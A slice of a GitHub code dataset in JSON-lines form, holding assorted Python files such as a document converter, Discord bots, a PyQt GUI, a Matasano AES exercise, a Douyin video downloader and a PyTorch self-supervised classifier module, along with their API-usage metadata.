"line_number": 27, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 33, "usage_type": "call"}, {"api_name": "matplotlib.pylab.rcParams.update", "line_number": 58, "usage_type": "call"}, {"api_name": "matplotlib.pylab.rcParams", "line_number": 58, "usage_type": "attribute"}, {"api_name": "matplotlib.pylab", "line_number": 58, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 69, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 69, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 74, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 75, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 89, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 98, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 98, "usage_type": "name"}, {"api_name": "numpy.max", "line_number": 102, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 102, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 122, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 122, "usage_type": "call"}, {"api_name": "numpy.triu_indices", "line_number": 129, "usage_type": "call"}, {"api_name": "numpy.diag_indices", "line_number": 130, "usage_type": "call"}, {"api_name": "numpy.tril_indices", "line_number": 131, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 133, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 133, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 134, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 134, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 135, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 135, "usage_type": "call"}]} +{"seq_id": "73336459805", "text": "#!/usr/bin/python3\n\nimport argparse\nimport glob\nimport os\nimport re\n\nimport win32com.client as win32\nfrom win32com.client import constants\n\ndef convert(root_path):\n \"\"\"Converts .doc files under root_path to .docx\"\"\"\n\n def save_as_docx(doc_path):\n \"Helper function that saves a .doc to .docx\"\n\n # open doc in word\n word = win32.gencache.EnsureDispatch('Word.Application')\n doc = word.Documents.Open(path)\n doc.Activate()\n\n docx_path = re.sub(r'\\.\\w+$', '.docx',\n os.path.abspath(doc_path))\n word.ActiveDocument.SaveAs(\n docx_path, FileFormat=constants.wdFormatXMLDocument)\n doc.Close(False)\n print(\"{} -> {}\".format(doc_path, docx_path))\n\n # Create list of paths to .doc files\n for path in glob.glob(\"{}/**/*.doc\".format(root_path),\n recursive=True):\n save_as_docx(path)\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(\n description='Converts .doc to docx.')\n parser.add_argument('path',\n help='folder path to look for .doc files')\n args = parser.parse_args()\n convert(args.path)\n", "repo_name": "lisaong/laughing-meme", "sub_path": "scripts/doc_to_docx.py", "file_name": "doc_to_docx.py", "file_ext": "py", "file_size_in_byte": 1130, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "win32com.client.gencache.EnsureDispatch", "line_number": 18, "usage_type": "call"}, {"api_name": "win32com.client.gencache", "line_number": 18, "usage_type": "attribute"}, {"api_name": "win32com.client", "line_number": 18, "usage_type": "name"}, {"api_name": "re.sub", "line_number": 22, "usage_type": "call"}, {"api_name": "os.path.abspath", 
"line_number": 23, "usage_type": "call"}, {"api_name": "os.path", "line_number": 23, "usage_type": "attribute"}, {"api_name": "win32com.client.constants.wdFormatXMLDocument", "line_number": 25, "usage_type": "attribute"}, {"api_name": "win32com.client.constants", "line_number": 25, "usage_type": "name"}, {"api_name": "glob.glob", "line_number": 30, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 35, "usage_type": "call"}]} +{"seq_id": "918026667", "text": "from typing import Any, List, Union\n\nfrom vuka.core import BaseObject\n\n\ndef is_vuka_object(obj: Any) -> bool:\n \"\"\"Test of obj for belonging to BaseObject.\n\n Args:\n obj: Any\n\n Returns:\n True, if the obj is an object of class BaseObject, else False\n \"\"\"\n if isinstance(obj, BaseObject):\n return True\n return False\n\n\ndef get_object_by_uuid(objects: List, uuid4: str) -> Union[Any]:\n \"\"\"\n\n Args:\n objects: vuka.core module class objects.\n uuid4: Universally unique identifier.\n\n Returns:\n vuka.core module class object.\n\n \"\"\"\n for obj in objects:\n if obj.uuid == uuid4:\n return obj\n return None\n", "repo_name": "Maxfashko/test_project_classifier", "sub_path": "libs/models-storage-common/vuka/utils/misc.py", "file_name": "misc.py", "file_ext": "py", "file_size_in_byte": 687, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "typing.Any", "line_number": 6, "usage_type": "name"}, {"api_name": "vuka.core.BaseObject", "line_number": 15, "usage_type": "argument"}, {"api_name": "typing.List", "line_number": 20, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 20, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 20, "usage_type": "name"}]} +{"seq_id": "8635938008", "text": "import requests\r\nimport json\r\ntoken = 'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJ0ZXN0IiwiZXhwIjoxNjcwNzgzNDQ5fQ.cVTAEsCmyXg2h_ZRQJaMPYln0ujb-qGIkbNi0P64A60'\r\nurl1 = 'https://api-v2.douyin.wtf/douyin_profile_videos/'\r\nvideourl = 'https://v.douyin.com/hBXAnqb/'\r\ncount = 4\r\ntoken = \"Bearer\" + \" \" + token\r\nheaders={\r\n \"authorization\": token\r\n}\r\nk =[]\r\ni = 0\r\nparameters = {'douyin_profile_url':videourl,'count':count}#加入参数来筛选数值\r\npro_res = requests.get(url1,headers=headers,params=parameters)\r\ndata1 = pro_res.content.decode()\r\na = json.loads(data1)\r\nb = a['aweme_list']\r\nfor c in b:\r\n d = c['video']\r\n e = d['play_addr']\r\n f = e['url_list'][0]\r\n k.append(f)\r\nwhile i < count:\r\n t = k[i]\r\n downlist = requests.get(t)\r\n with open(r'D:\\下载视频源\\page%s.mp4'%(i), 'wb') as e:\r\n e.write(downlist.content)\r\n i += 1\r\nprint(\"完成\")\r\n\r\n", "repo_name": "lioneltest2324/test", "sub_path": "抖音-北京动物园.py", "file_name": "抖音-北京动物园.py", "file_ext": "py", "file_size_in_byte": 865, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "requests.get", "line_number": 14, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 16, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 25, "usage_type": "call"}]} +{"seq_id": "73283610525", "text": "import aiohttp\nfrom discord.ext import commands\n\n\nclass Web:\n def __init__(self, client):\n self.client = client\n\n @commands.command(name='u',\n help='Returns search term from urbandictionary.com')\n async def urban(self, *, search_term):\n search_term = aiohttp.helpers.requote_uri(search_term)\n session = 
aiohttp.ClientSession()\n async with session.get('http://api.urbandictionary.com/v0/define?term={}'.format(search_term)) as resp:\n assert resp.status == 200\n resp_parsed = await resp.json()\n resp_msg = resp_parsed['list'][0]['definition'][:1900] if resp_parsed['list'] else 'Something went wrong \\U0001F641'\n await self.client.reply('{}'.format(resp_msg))\n\n\ndef setup(client):\n client.add_cog(Web(client))\n", "repo_name": "Grifs99/Refrigerator", "sub_path": "exts/web.py", "file_name": "web.py", "file_ext": "py", "file_size_in_byte": 813, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "86", "api": [{"api_name": "aiohttp.helpers.requote_uri", "line_number": 12, "usage_type": "call"}, {"api_name": "aiohttp.helpers", "line_number": 12, "usage_type": "attribute"}, {"api_name": "aiohttp.ClientSession", "line_number": 13, "usage_type": "call"}, {"api_name": "discord.ext.commands.command", "line_number": 9, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 9, "usage_type": "name"}]} +{"seq_id": "5603858718", "text": "\nimport sys\nfrom PyQt5.QtWidgets import (QWidget, QPushButton, QHBoxLayout, QVBoxLayout, QApplication, QLineEdit)\nimport wykres\nimport numpy as np\n\nclass Example(QWidget):\n\n def __init__(self):\n super().__init__()\n\n self.initUI()\n\n def initUI(self):\n #widgety\n #wykres\n Wykres = wykres.TestWindow()\n npoints = 1000000\n xdata = np.linspace(0., 10., npoints)\n Wykres.add_data(xdata, np.sin(xdata))\n Wykres.add_data(xdata, np.cos(xdata))\n Wykres.set_title(\"Simple example with %d curves of %d points \" \\\n \"(OpenGL Accelerated Series)\" \\\n % (Wykres.ncurves, npoints))\n Wykres.setWindowTitle(\"Simple performance example\")\n Wykres.show()\n Wykres.resize(500, 500)\n\n mapa = QPushButton(\"mapa\")\n kompas = QPushButton(\"kompas\")\n up = QPushButton(\"W\")\n down = QPushButton(\"S\")\n left = QPushButton(\"A\")\n right = QPushButton(\"D\")\n P1_disp = QLineEdit(\"P\")\n P1_add = QPushButton()\n P1_sub = QPushButton()\n I1_disp = QLineEdit(\"I\")\n I1_add = QPushButton()\n I1_sub = QPushButton()\n D1_disp = QLineEdit(\"D\")\n D1_add = QPushButton()\n D1_sub = QPushButton()\n P2_disp = QLineEdit(\"P\")\n P2_add = QPushButton()\n P2_sub = QPushButton()\n I2_disp = QLineEdit(\"I\")\n I2_add = QPushButton()\n I2_sub = QPushButton()\n D2_disp = QLineEdit(\"D\")\n D2_add = QPushButton()\n D2_sub = QPushButton()\n\n #P1\n P1 = QVBoxLayout()\n P1.addWidget(P1_add)\n P1.addWidget(P1_disp)\n P1.addWidget(P1_sub)\n\n #I1\n I1 = QVBoxLayout()\n I1.addWidget(I1_add)\n I1.addWidget(I1_disp)\n I1.addWidget(I1_sub)\n\n #D1\n D1 = QVBoxLayout()\n D1.addWidget(D1_add)\n D1.addWidget(D1_disp)\n D1.addWidget(D1_sub)\n\n # P2\n P2 = QVBoxLayout()\n P2.addWidget(P2_add)\n P2.addWidget(P2_disp)\n P2.addWidget(P2_sub)\n\n #I2\n I2 = QVBoxLayout()\n I2.addWidget(I2_add)\n I2.addWidget(I2_disp)\n I2.addWidget(I2_sub)\n\n #D2\n D2 = QVBoxLayout()\n D2.addWidget(D2_add)\n D2.addWidget(D2_disp)\n D2.addWidget(D2_sub)\n\n #strzalki\n strzalki_gora = QHBoxLayout()\n strzalki_gora.addSpacing(100)\n strzalki_gora.addWidget(up)\n strzalki_gora.addSpacing(100)\n\n strzalki_dol = QHBoxLayout()\n strzalki_dol.addWidget(left)\n strzalki_dol.addWidget(down)\n strzalki_dol.addWidget(right)\n\n strzalki = QVBoxLayout()\n strzalki.addLayout(strzalki_gora)\n strzalki.addLayout(strzalki_dol)\n\n #pidy\n pidy_gora = QHBoxLayout()\n pidy_gora.addLayout(P1)\n pidy_gora.addLayout(I1)\n pidy_gora.addLayout(D1)\n\n pidy_dol = 
QHBoxLayout()\n pidy_dol.addLayout(P2)\n pidy_dol.addLayout(I2)\n pidy_dol.addLayout(D2)\n\n pidy = QVBoxLayout()\n pidy.addLayout(pidy_gora)\n pidy.addLayout(pidy_dol)\n\n #gorna linia aplikacji\n hbox1 = QHBoxLayout()\n #hbox1.addStretch(1)\n hbox1.addWidget(Wykres)\n hbox1.addWidget(mapa)\n\n\n #dolna linia aplikacji\n hbox2 = QHBoxLayout()\n hbox2.addLayout(pidy)\n hbox2.addWidget(kompas)\n hbox2.addLayout(strzalki)\n\n #zlozenie gornej i dolnej linii aplikacji\n vbox = QVBoxLayout()\n #vbox.addStretch(1)\n vbox.addLayout(hbox1)\n vbox.addLayout(hbox2)\n\n self.setLayout(vbox)\n\n self.setGeometry(300, 300, 300, 500)\n self.setWindowTitle('Telemetria Romka')\n self.show()\n\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n ex = Example()\n sys.exit(app.exec_())", "repo_name": "UpdatedSnake/test-repository", "sub_path": "pr1/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 3823, "program_lang": "python", "lang": "es", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "PyQt5.QtWidgets.QWidget", "line_number": 7, "usage_type": "name"}, {"api_name": "wykres.TestWindow", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 21, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 29, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 30, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 31, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 32, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 33, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 34, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QLineEdit", "line_number": 35, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 36, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 37, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QLineEdit", "line_number": 38, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 39, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 40, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QLineEdit", "line_number": 41, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 42, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 43, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QLineEdit", "line_number": 44, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 45, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 46, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QLineEdit", "line_number": 47, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 48, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 49, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QLineEdit", "line_number": 50, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 51, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 52, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QVBoxLayout", "line_number": 55, "usage_type": 
"call"}, {"api_name": "PyQt5.QtWidgets.QVBoxLayout", "line_number": 61, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QVBoxLayout", "line_number": 67, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QVBoxLayout", "line_number": 73, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QVBoxLayout", "line_number": 79, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QVBoxLayout", "line_number": 85, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QHBoxLayout", "line_number": 91, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QHBoxLayout", "line_number": 96, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QVBoxLayout", "line_number": 101, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QHBoxLayout", "line_number": 106, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QHBoxLayout", "line_number": 111, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QVBoxLayout", "line_number": 116, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QHBoxLayout", "line_number": 121, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QHBoxLayout", "line_number": 128, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QVBoxLayout", "line_number": 134, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QApplication", "line_number": 148, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 148, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 150, "usage_type": "call"}]} +{"seq_id": "7858409593", "text": "import datetime\n\nimport six\nfrom dateutil.parser import parse\n\nfrom scrapi import util\n\n\nclass TestScrapiUtils(object):\n\n def test_copy_to_unicode(self):\n converted = util.copy_to_unicode('test')\n\n assert converted == u'test'\n assert isinstance(converted, six.text_type)\n\n def test_timestamp(self):\n timestamp = util.timestamp()\n parsed = parse(timestamp)\n\n assert isinstance(parsed, datetime.datetime)\n\n def test_stamp_from_raw(self):\n raw_doc = {'doc': 'Macho Man Story', 'timestamps': {}}\n new_stamps = {'done': 'now'}\n\n stamped_raw = util.stamp_from_raw(raw_doc, **new_stamps)\n\n assert isinstance(stamped_raw, dict)\n assert set(stamped_raw.keys()) == set(['done', 'normalizeFinished'])\n", "repo_name": "CenterForOpenScience/scrapi", "sub_path": "tests/test_utils.py", "file_name": "test_utils.py", "file_ext": "py", "file_size_in_byte": 776, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 41, "dataset": "github-code", "pt": "86", "api": [{"api_name": "scrapi.util.copy_to_unicode", "line_number": 12, "usage_type": "call"}, {"api_name": "scrapi.util", "line_number": 12, "usage_type": "name"}, {"api_name": "six.text_type", "line_number": 15, "usage_type": "attribute"}, {"api_name": "scrapi.util.timestamp", "line_number": 18, "usage_type": "call"}, {"api_name": "scrapi.util", "line_number": 18, "usage_type": "name"}, {"api_name": "dateutil.parser.parse", "line_number": 19, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 21, "usage_type": "attribute"}, {"api_name": "scrapi.util.stamp_from_raw", "line_number": 27, "usage_type": "call"}, {"api_name": "scrapi.util", "line_number": 27, "usage_type": "name"}]} +{"seq_id": "17663844317", "text": "#!/usr/bin/python3\n\nfrom Crypto.Cipher import AES\nimport base64\n\ndef decryptAES_ECB(enc):\n key = \"YELLOW SUBMARINE\"\n mode = AES.MODE_ECB\n aes = AES.new(key, mode)\n return aes.decrypt(enc)\n\nif __name__ == \"__main__\":\n t3 = \"\"\n with open('7.txt', 'r') as myfile:\n t3=myfile.read().replace('\\n', '')\n t3 = 
base64.b64decode(t3)\n print(\"Decrypted:\")\n print(decryptAES_ECB(t3).decode('latin1')[:256])\n", "repo_name": "tezeb/matasano", "sub_path": "s1/c7.py", "file_name": "c7.py", "file_ext": "py", "file_size_in_byte": 429, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "Crypto.Cipher.AES.MODE_ECB", "line_number": 8, "usage_type": "attribute"}, {"api_name": "Crypto.Cipher.AES", "line_number": 8, "usage_type": "name"}, {"api_name": "Crypto.Cipher.AES.new", "line_number": 9, "usage_type": "call"}, {"api_name": "Crypto.Cipher.AES", "line_number": 9, "usage_type": "name"}, {"api_name": "base64.b64decode", "line_number": 16, "usage_type": "call"}]} +{"seq_id": "74838430364", "text": "import discord, sys, re, yagmail, random\n\n\nyag = yagmail.SMTP(\"username\", \"password\")\n\nrandom.seed(1)\n\ntoken = \"token\"\n\nclient = discord.Client()\nid = None\nunverified = {}\n\n@client.event\nasync def on_member_join(member):\n\t\n\tglobal unverified\n\n\tunverified.update({member.id: None})\n\tawait member.send(\"Welcome. Please type the email address you registered with to confirm your identity.\")\n\n@client.event\nasync def on_message(message):\n\n\tglobal unverified\n\n\tif message.author.id in unverified:\n\t\tif re.match(\"^\\S*@\\S*\\.\\S*$\", message.content) is not None:\n\n\t\t\tpin = random.randint(100000, 999999)\n\t\t\tunverified.update({message.author.id: pin})\n\n\t\t\temail = [\n\t\t\t\t\"Please type the pin below into the ID-Check bot channel to verify email.\\n\"\n\t\t\t\t\"PIN: {}\".format(pin)\n\t\t\t]\n\n\t\t\tyag.send(message.content, 'subject', email)\n\n\t\t\tawait message.author.send(\"Verification email has been sent.\")\n\t\t\n\t\telif re.match(\"\\d{6}\", message.content) is not None:\n\n\t\t\tif int(message.content) == unverified[message.author.id]:\n\n\t\t\t\tprint(\"{} has been verified\".format(message.author))\n\t\t\t\tdel unverified[message.author.id]\n\n\ntry:\n\tclient.run(token)\nexcept KeyboardInterrupt:\n\tsys.exit()", "repo_name": "clodi99/2FA-discord-bot", "sub_path": "bot.py", "file_name": "bot.py", "file_ext": "py", "file_size_in_byte": 1162, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "yagmail.SMTP", "line_number": 4, "usage_type": "call"}, {"api_name": "random.seed", "line_number": 6, "usage_type": "call"}, {"api_name": "discord.Client", "line_number": 10, "usage_type": "call"}, {"api_name": "re.match", "line_number": 28, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 30, "usage_type": "call"}, {"api_name": "re.match", "line_number": 42, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 53, "usage_type": "call"}]} +{"seq_id": "11113613562", "text": "import sys\nfrom collections import deque\n\ndef bfs(graph,visited, n, x, y):\n q = deque()\n q.append([x,y])\n\n visited[x][y] = True\n dx = [0,0,1,-1]\n dy = [1,-1,0,0]\n\n while q:\n a,b = q.popleft()\n for i in range(4):\n nx = a + dx[i]\n ny = b + dy[i]\n if 0<=nx<n and 0<=ny<n:\n if visited[nx][ny] == False:\n if graph[a][b] == graph[nx][ny]:\n q.append([nx,ny])\n visited[nx][ny] = True\n\n\nn = int(sys.stdin.readline().rstrip())\n\ngraph = [ list(map(str, sys.stdin.readline().rstrip())) for _ in range(n) ]\nvisited = [ [False]*n for _ in range(n) ]\n\n\ncount = 0\ncount_no = 0\nfor i in range(n):\n for j in range(n):\n if visited[i][j] == False:\n bfs(graph,visited, n, i, j)\n count+=1\n # if 
visited_no[i][j] == False:\n # bfs(graph_no, visited_no, n, i, j)\n # count_no+=1\n\nvisited = [ [False]*n for _ in range(n)]\nfor i in range(n):\n for j in range(n):\n if graph[i][j] == 'R' or graph[i][j] == 'G':\n graph[i][j] = 'S'\n\nfor i in range(n):\n for j in range(n):\n if visited[i][j] == False:\n bfs(graph,visited, n, i, j)\n count_no+=1\n # if visited_no[i][j] == False:\n # bfs(graph_no, visited_no, n, i, j)\n # count_no+=1\n\nprint(count,count_no)", "repo_name": "yutan0565/Algorithm_python", "sub_path": "BH/05_코딩테스트 알고리즘 정복 3단계 BFS_DFS (난이도 중)/10026_적록색약.py", "file_name": "10026_적록색약.py", "file_ext": "py", "file_size_in_byte": 1405, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "86", "api": [{"api_name": "collections.deque", "line_number": 5, "usage_type": "call"}, {"api_name": "sys.stdin.readline", "line_number": 24, "usage_type": "call"}, {"api_name": "sys.stdin", "line_number": 24, "usage_type": "attribute"}, {"api_name": "sys.stdin.readline", "line_number": 26, "usage_type": "call"}, {"api_name": "sys.stdin", "line_number": 26, "usage_type": "attribute"}]} +{"seq_id": "75057304284", "text": "from argparse import ArgumentParser\nimport glob\nfrom argparse import ArgumentParser\nimport json\n\nimport torch\nfrom torch import nn\nfrom torch.nn import functional as F\nfrom pytorch_lightning import LightningModule\nfrom torch.utils import data\nfrom torchmetrics import Accuracy, R2Score\n#from sklearn.metrics import r2_score\n\nfrom barlow_twins_yao_training.barlowtwins_module import BarlowTwins\nfrom huy_Supervised_models_training_CIFAR10.module import CIFAR10Module\nfrom bolt_self_supervised_training.simclr.simclr_module import SimCLR\nfrom bolt_self_supervised_training.simsiam.simsiam_module import SimSiam\n\nfrom huy_Supervised_models_training_CIFAR10.module import Causal3DidentModel\n\n\nclass SSL_encoder_linear_classifier(LightningModule):\n ''' This is an self-supervised learning module + linear classifier added to the last layer.\n So we can use the SSL encoder for classification. \n It also includes the info about training and optimizer. 
\n This can also be a regressor in case of 3dident.\n '''\n def __init__(self, model, path, dataset='cifar10', regress_latents=False, classify_spotlight=False, feature_num=512, class_num=10, optimizer=None, learning_rate=1, loading=False, **kwargs):\n ''' model: the type of SSL model to use as encoder\n path: the chekpoint for the best model chekpoint\n feature_num: number of output features for the unsupervised model\n class_num: number of classes, if regress_latents then the number of latents to regress.\n regress_latents: in case of 3dident whether to classify objects or regress latents.\n '''\n super().__init__()\n if not loading:\n self.save_hyperparameters()\n self.optim = optimizer\n self.lr = learning_rate\n\n self.dataset = dataset\n self.regress_latents = regress_latents\n self.classify_spotlight = classify_spotlight\n\n #the masurement is accuracy\n self.train_acc = Accuracy()\n self.val_acc = Accuracy()\n \n \"\"\" # or coefficient of determination (hacky), seperated to be able to report them individually.\n self.train_r2_scores = []\n self.val_r2_scores = []\n for i in range(class_num):\n self.train_r2_scores.append(R2Score())\n self.val_r2_scores.append(R2Score())\n # register the metrics properly as a child.\n self.train_r2_scores = nn.ModuleList(self.train_r2_scores)\n self.val_r2_scores = nn.ModuleList(self.val_r2_scores) \"\"\"\n\n \"\"\" self.train_spotlight_R2 = R2Score()\n self.val_spotlight_R2 = R2Score() \"\"\"\n\n\n if dataset == '3dident' and classify_spotlight:\n class_num = 3\n else:\n class_num = 10\n \n\n # disable the gradient of encoder and put it in eval mode\n self.encoder = Encoder(model, path, dataset)\n # add a linear layer (#features to #classes) \n self.final_linear_layer = nn.Linear(feature_num, class_num)\n\n def forward(self, x):\n features = self.encoder(x)\n return self.final_linear_layer(features)\n\n def shared_step(self, batch, mode):\n # note for each batch we get: \n # cifar: data, target, index \n # 3dident: data, target, latents\n if self.dataset == 'cifar10' :\n x, y, _ = batch\n y_hat = self(x)\n loss = F.cross_entropy(y_hat, y)\n\n self.log(f'{mode}_classification_loss', loss, on_step=False, on_epoch=True)\n\n if mode == 'train':\n acc = self.train_acc(y_hat, y)\n else:\n acc = self.val_acc(y_hat, y)\n self.log(f'{mode}_acc', acc, on_step=False, on_epoch=True)\n \n elif self.classify_spotlight:\n images, _, latents = batch\n\n # get classes\n labels = Causal3DidentModel.spotlight_label_from_latent(latents)\n labels = labels.to(images.device)\n # filter outputs \n images = images[labels != -1]\n # filter labels\n labels = labels[labels != -1]\n\n outputs = self(images)\n\n _, predictions = torch.max(outputs, 1)\n loss = F.cross_entropy(outputs, labels)\n self.log(f'{mode}_classification_loss', loss) #, on_step=True, on_epoch=True)\n\n if mode == 'train':\n acc = self.train_acc(predictions, labels)\n else:\n acc = self.val_acc(predictions, labels)\n self.log(f'{mode}_acc', acc) #, on_step=True, on_epoch=True)\n\n\n \"\"\" There is a problem with speed and logging gives error\n elif self.dataset == '3dident' and self.regress_latents:\n x, object_class, latents = batch\n y_hat = self(x)\n loss = F.mse_loss(y_hat, latents)\n\n self.log(f'{mode}_regession_loss', loss, on_step=False, on_epoch=True)\n\n if mode == 'train':\n for i, r2_score in enumerate(self.train_r2_scores):\n r2_score(y_hat[:,i], latents[:,i])\n self.log(f'train_R^2/{i}', r2_score, on_step=False, on_epoch=True)\n else: \n for i, r2_score in enumerate(self.val_r2_scores):\n 
r2_score(y_hat[:,i], latents[:,i])\n                    self.log(f'val_R^2/{i}', r2_score, on_step=False, on_epoch=True)\n            \n            if mode =='train':\n                r2 = self.train_spotlight_R2(y_hat[:,6], latents[:,6])\n            else:\n                r2 = self.val_spotlight_R2(y_hat[:,6], latents[:,6])\n            \n            self.log(f'{mode}_R^2_spotlight', r2, on_step=False, on_epoch=True) \n\n        else:\n            raise NotImplementedError('dataset or regression type not implemented !') \"\"\"\n\n\n        return loss\n\n\n    def training_step(self, batch, batch_nb):\n\n        return self.shared_step(batch, mode='train')\n    \n    def validation_step(self, batch, batch_idx):\n\n        return self.shared_step(batch, mode='val')\n\n\n    def configure_optimizers(self):\n        # only optimize the linear layer !\n        if self.optim == 'adam':\n            return torch.optim.Adam(self.final_linear_layer.parameters(), lr=self.lr)\n        else:\n            raise NotImplementedError('that optimizer is not implemented.')\n\n    @classmethod\n    def load_from_checkpoint(\n        cls,\n        checkpoint_path,\n        mode,\n        from_version=True,\n        map_location = None,\n        hparams_file = None,\n        strict: bool = True,\n        **kwargs,\n    ):\n        '''I overwrite the load for easier loading. \n\n        mode: 'standard' or 'robust' determines how to choose the checkpoint\n\n        from_version: if True, it is enough to specify the version. I will choose the best checkpoint. \n                    if False you can pass a specific checkpoint from a version.\n        '''\n\n        if from_version:\n            if mode == 'standard':\n                # go to checkpoint, choose the only checkpoint and load it.\n                # lightning uses the hparam file to initialize the model which loads the encoder automatically.\n                chkpts = glob.glob(checkpoint_path+\"/checkpoints/*\")\n                if len(chkpts)==1:\n                    print('Loading: ' + chkpts[0])\n                    return super().load_from_checkpoint(chkpts[0], map_location, hparams_file, strict, **kwargs)\n                elif len(chkpts)==0:\n                    raise FileNotFoundError('No checkpoints were found !')\n                else:\n                    raise NotImplementedError('Multiple checkpoints found. 
This standard loading is not implemented')\n            \n            elif mode == 'robust':\n                # this corresponds to my library's results\n                # look for the checkpoint starting with best in its name\n                chkpts = glob.glob(checkpoint_path+\"/checkpoints/best*.pt\")\n                if len(chkpts)==1:\n                    chpt = chkpts[0]\n                    print(\"loading: \" + chpt)\n                    # find the hparams file and load the encoder network\n                    hparams_path = checkpoint_path + '/commandline_args.txt'\n                    with open(hparams_path, 'r') as f:\n                        hparams = json.load(f)\n                    \n                    # load the encoder (for some reason running save_hparams throws an error, that's why I added the loading flag.)\n                    model = cls(hparams['model'], hparams['path'], loading=True)\n                    # load the linear layer\n                    model_dict = torch.load(chpt) \n                    bias = model_dict['model.final_linear_layer.bias']\n                    weights = model_dict['model.final_linear_layer.weight']\n                    model.final_linear_layer.weight = torch.nn.Parameter(weights)\n                    model.final_linear_layer.bias = torch.nn.Parameter(bias)\n\n                    return model\n\n                elif len(chkpts)==0:\n                    raise FileNotFoundError('No checkpoints were found !')\n                \n                else:\n                    raise 